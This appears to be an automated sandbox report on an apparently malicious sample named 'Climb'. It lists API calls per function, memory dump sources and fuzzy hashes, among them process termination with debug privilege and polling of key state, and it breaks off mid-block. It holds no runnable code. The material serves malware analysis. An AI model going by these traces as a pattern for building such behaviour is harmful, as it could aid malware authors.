                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0057AC10
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0057ACC5
                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 0057ACD0
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057AD21
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                                      • Opcode ID: e6de8a680fda72b5a7c50f5572872a8606d83a126c12519662613a6e0a453337
                                                                                                                                                                      • Instruction ID: 2a417e302c2a4abdbd5f76f5b9f60cea035958575f43efbff4ca9e6f2bc5e994
                                                                                                                                                                      • Opcode Fuzzy Hash: e6de8a680fda72b5a7c50f5572872a8606d83a126c12519662613a6e0a453337
                                                                                                                                                                      • Instruction Fuzzy Hash: B5619B70204202AFD321DF15D498F29BBE5BF94308F54C49DF86A8B6A2C775EC49DB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005843C1
                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 005843D6
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005843F0
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00584435
                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00584462
                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00584490
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                      • API String ID: 2147712094-78025650
                                                                                                                                                                      • Opcode ID: 516d5272b9b1adbcb2afd97e04a9c429c3a34c44c8c69df853e7dbb8983a5f06
                                                                                                                                                                      • Instruction ID: 2827195f67ceeca165406e19cc153a3d7b2cc4ee6048a027418f0094e1e21a09
                                                                                                                                                                      • Opcode Fuzzy Hash: 516d5272b9b1adbcb2afd97e04a9c429c3a34c44c8c69df853e7dbb8983a5f06
                                                                                                                                                                      • Instruction Fuzzy Hash: 2441AE7190030AABEF21AF64CC49BEA7BA9FB48360F10052AFD54F7291D7759984DF90
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0055C6C4
                                                                                                                                                                      • IsMenu.USER32(00000000), ref: 0055C6E4
                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0055C71A
                                                                                                                                                                      • GetMenuItemCount.USER32(018BFB88), ref: 0055C76B
                                                                                                                                                                      • InsertMenuItemW.USER32(018BFB88,?,00000001,00000030), ref: 0055C793
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                      • String ID: 0$2
                                                                                                                                                                      • API String ID: 93392585-3793063076
                                                                                                                                                                      • Opcode ID: 088505ebaff8a86f7186799f770a7487842b11dd190bf66943bfeab8a6ecab79
                                                                                                                                                                      • Instruction ID: 7e7d0aba2bd7db45cdcfed67bd36e51c20638257afdf2f9e03a8682d61b8fdd4
                                                                                                                                                                      • Opcode Fuzzy Hash: 088505ebaff8a86f7186799f770a7487842b11dd190bf66943bfeab8a6ecab79
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C518A706103059FDB10CF68D8A8AAEBFF4FB58319F24455BEC11A6691E3709948CFA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 004F19E1
                                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 004F19FE
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 004F1A23
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 004F1A3D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                      • String ID: $'O$$'O
                                                                                                                                                                      • API String ID: 4210589936-1244004566
                                                                                                                                                                      • Opcode ID: 48af3336e66eec060e17a13d6e50f6b77f2066f8bd612302e88320827056a3cc
                                                                                                                                                                      • Instruction ID: 9be7695eb24140d42d7ffb61fd9acd7905f4a27fa23033d45d666e2a5003bec7
                                                                                                                                                                      • Opcode Fuzzy Hash: 48af3336e66eec060e17a13d6e50f6b77f2066f8bd612302e88320827056a3cc
                                                                                                                                                                      • Instruction Fuzzy Hash: EB415071A0420AFFDF15AF64C844BFEBB74FB05324F20821AE969A22A0D7346A54DB51
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00588740
                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00588765
                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0058877D
                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 005887A6
                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0056C1F2,00000000), ref: 005887C6
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 005887B1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 2294984445-3685820393
                                                                                                                                                                      • Opcode ID: d1752466c17b1c50c24dcc20a498340e35fe66a3795dbd9d35222e815c836d61
                                                                                                                                                                      • Instruction ID: 3a905d32be82f13c7d99b042469338b08098fa4fddadb344abfcd18e737c2aa6
                                                                                                                                                                      • Opcode Fuzzy Hash: d1752466c17b1c50c24dcc20a498340e35fe66a3795dbd9d35222e815c836d61
                                                                                                                                                                      • Instruction Fuzzy Hash: 0321A1716102459FCB14AF39CC08B7A3BB6FB44365F644A29FD26E21E0EF319854DB20
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 0055D1BE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                      • Opcode ID: 2efd3d4dc532b6585e243a9450557dd7e54a79fc0afcd6d985fc15fbb3b849f6
                                                                                                                                                                      • Instruction ID: 3a5389b8cedd49d55c884353147de73f60d70de21454b916b830924fb81abc16
                                                                                                                                                                      • Opcode Fuzzy Hash: 2efd3d4dc532b6585e243a9450557dd7e54a79fc0afcd6d985fc15fbb3b849f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 2811DB3324870ABAF7155A14EC92DAE6FBCFF59761B200017FD01A52C1D7B46A448670
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                      • API String ID: 642191829-3771769585
                                                                                                                                                                      • Opcode ID: 6a449db3a2aa297e685fe07321838434d17505ab8cbe8f3a8deead88b6d9f976
                                                                                                                                                                      • Instruction ID: f26b9d0f8af29cf6c4e708c933d7ededa3de000181848cf998e84c9df0193935
                                                                                                                                                                      • Opcode Fuzzy Hash: 6a449db3a2aa297e685fe07321838434d17505ab8cbe8f3a8deead88b6d9f976
                                                                                                                                                                      • Instruction Fuzzy Hash: D511E471900115BBDB246720DC4BEEA7FBCFF45711F0000A6F915E6091EE749B8ADB60
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$LocalTime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 952045576-0
                                                                                                                                                                      • Opcode ID: a3f4e9ff33060f7cc4097bd567117a0acbfc952133637cdfbe5ba8e889412995
                                                                                                                                                                      • Instruction ID: bd3bb9ccbceeb80cf00dfc94a3309ed38af316e4348b336fb48b628bdee6f6d4
                                                                                                                                                                      • Opcode Fuzzy Hash: a3f4e9ff33060f7cc4097bd567117a0acbfc952133637cdfbe5ba8e889412995
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A41B065C10205B5EB11EBB88C8AACFBBB8FF45350F008422E509E3121FB34E695C7E6
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 005837B7
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 005837BF
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005837CA
                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 005837D6
                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00583812
                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00583823
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00586504,?,?,000000FF,00000000,?,000000FF,?), ref: 0058385E
                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0058387D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                      • Opcode ID: 5440a8f8a17f0c281adfb4ae8b8c829dcb4b75a5992d443f22663f0e9374f963
                                                                                                                                                                      • Instruction ID: 1eebb7d7cd71df07d20c13e128cf3af326cffb0ef575b223690aa96f97954c42
                                                                                                                                                                      • Opcode Fuzzy Hash: 5440a8f8a17f0c281adfb4ae8b8c829dcb4b75a5992d443f22663f0e9374f963
                                                                                                                                                                      • Instruction Fuzzy Hash: 21317C72201214ABEB159F509C8AFEB3FA9FF59721F044065FE08EA191D6B59941CBB0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                      • API String ID: 0-572801152
                                                                                                                                                                      • Opcode ID: 90d9ab64b42cb2ab5eb97c239711104636b073fb916d6ee1e42f019f69202baa
                                                                                                                                                                      • Instruction ID: f167bc1b62e543eae091c9ab864af9907757878945da597450542d24b2213c5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 90d9ab64b42cb2ab5eb97c239711104636b073fb916d6ee1e42f019f69202baa
                                                                                                                                                                      • Instruction Fuzzy Hash: 52D1AF71A0060A9FDF10CF68D885BAEBBB5FF48304F14C469E919AB281E7B0ED45DB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0053194E
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 005319D1
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00531B7B,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00531A64
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00531A7B
                                                                                                                                                                        • Part of subcall function 00523B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00516A79,?,0000015D,?,?,?,?,005185B0,000000FF,00000000,?,?), ref: 00523BC5
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00531AF7
                                                                                                                                                                      • __freea.LIBCMT ref: 00531B22
                                                                                                                                                                      • __freea.LIBCMT ref: 00531B2E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2829977744-0
                                                                                                                                                                      • Opcode ID: 3266c5f82cea89a5e332248f42f4dffd06008ee8ff211f7f81d83ed603fd27db
                                                                                                                                                                      • Instruction ID: f0468532418f2af3499779205c1d341f945c1ae3880cd5d3daeaace18a5799ee
                                                                                                                                                                      • Opcode Fuzzy Hash: 3266c5f82cea89a5e332248f42f4dffd06008ee8ff211f7f81d83ed603fd27db
                                                                                                                                                                      • Instruction Fuzzy Hash: E091D672E00A169ADF208EB4CCA5BEEBFB5BF49710F180569E805E7181EB34DC45C768
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                      • API String ID: 2610073882-625585964
                                                                                                                                                                      • Opcode ID: cd871168ae0aeedeb137ab6b61ac3799ef1d2e9ad75cbf5bb0a722f80cb53d2a
                                                                                                                                                                      • Instruction ID: 38b2d010c23ab30854bd5fc86bc7c31f23ed022eef7bad56040d4a37bdeee0a3
                                                                                                                                                                      • Opcode Fuzzy Hash: cd871168ae0aeedeb137ab6b61ac3799ef1d2e9ad75cbf5bb0a722f80cb53d2a
                                                                                                                                                                      • Instruction Fuzzy Hash: E0919E70A00619ABDF20CFA5DC48FAEBFB8FF45714F108519F509AB280E7B09945DBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00561C1B
                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561C43
                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00561C67
                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561C97
                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561D1E
                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561D83
                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561DEF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2550207440-0
                                                                                                                                                                      • Opcode ID: 36c4e7a587188b86770ee20301fb29b078cb317e2137076c4c00d6923552e30b
                                                                                                                                                                      • Instruction ID: 844a87d6daab25cc865d458c219eea62e1cc23b7eee962d4b32334f3548dbc0f
                                                                                                                                                                      • Opcode Fuzzy Hash: 36c4e7a587188b86770ee20301fb29b078cb317e2137076c4c00d6923552e30b
                                                                                                                                                                      • Instruction Fuzzy Hash: DD91E275A00A19AFEB00DF94C889BFEBBB4FF44715F184419E901EB2A1D774AD44CB98
                                                                                                                                                                      APIs
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005743C8
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 005744D7
                                                                                                                                                                      • _wcslen.LIBCMT ref: 005744E7
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0057467C
                                                                                                                                                                        • Part of subcall function 0056169E: VariantInit.OLEAUT32(00000000), ref: 005616DE
                                                                                                                                                                        • Part of subcall function 0056169E: VariantCopy.OLEAUT32(?,?), ref: 005616E7
                                                                                                                                                                        • Part of subcall function 0056169E: VariantClear.OLEAUT32(?), ref: 005616F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
